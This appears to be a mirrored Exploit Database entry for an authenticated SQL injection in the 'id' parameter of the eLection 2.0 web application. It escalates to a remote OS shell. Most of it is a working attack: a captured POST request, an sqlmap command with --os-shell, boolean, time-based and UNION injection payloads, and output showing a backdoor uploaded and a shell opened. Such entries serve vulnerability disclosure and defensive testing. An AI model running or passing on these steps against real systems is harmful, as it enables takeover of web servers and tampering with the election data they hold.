eLection 2.0 – ‘id’ SQL Injection

• Exploit Database
• 102 阅读

• 作者： J3rryBl4nks
  日期： 2020-02-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48122/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62

  # Title: eLection 2.0 - 'id' SQL Injection # Date: 2020-02-21 # Exploit Author: J3rryBl4nks # Vendor Homepage: https://sourceforge.net/projects/election-by-tripath/ # Software Link: https://sourceforge.net/projects/election-by-tripath/files/#Version 2.0 # Tested on Ubuntu 19/Kali Rolling   # The eLection Web application is vulnerable to authenticated SQL Injection which leads to remote code execution: # Login to the admin portal and browse to the candidates section. Capture the request in BurpSuite and save it to file:   POST /election/admin/ajax/op_kandidat.php HTTP/1.1 Host: HOSTNAME User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://HOSTNAME/election/admin/kandidat.php?_ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 17 Connection: close Cookie: el_listing_panitia=5; el_mass_adding=false; el_listing_guru=5; el_listing_siswa=5; PHPSESSID=b4f0c3bbccd80e9d55fbe0269a29f96a; el_lang=en-us   aksi=fetch&id=256       Send the request to SQLMap with the following parameters:   sqlmap -r getcandidate --level=5 --risk=3 --os-shell -p id     SQLMap will find the injection:   --- Parameter: id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: aksi=fetch&id=256 AND 8584=8584   Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: aksi=fetch&id=256 AND (SELECT 8551 FROM (SELECT(SLEEP(5)))nYfJ)   Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: aksi=fetch&id=-9798 UNION ALL SELECT NULL,NULL,CONCAT(0x7170707171,0x676d755461434e486f49475051707357694861534e664f416f434269487042545a76454f5843584b,0x71717a7871),NULL,NULL-- dWMc ---     [09:39:07] [WARNING] unable to automatically parse any web server path [09:39:07] [INFO] trying to upload the file stager on '/opt/lampp/htdocs/election/' via LIMIT 'LINES TERMINATED BY' method [09:39:07] [INFO] the file stager has been successfully uploaded on '/opt/lampp/htdocs/election/' - http://HOSTNAME/election/tmpumlfm.php [09:39:07] [INFO] the backdoor has been successfully uploaded on '/opt/lampp/htdocs/election/' - http://HOSTNAME/election/tmpbpfkq.php [09:39:07] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER os-shell>     Due to the way the setup of the application requires you to change permissions on the directory of the web app, you should be able to get a shell.   https://github.com/J3rryBl4nks/eLection-TriPath-/blob/master/SQLiIntoRCE.md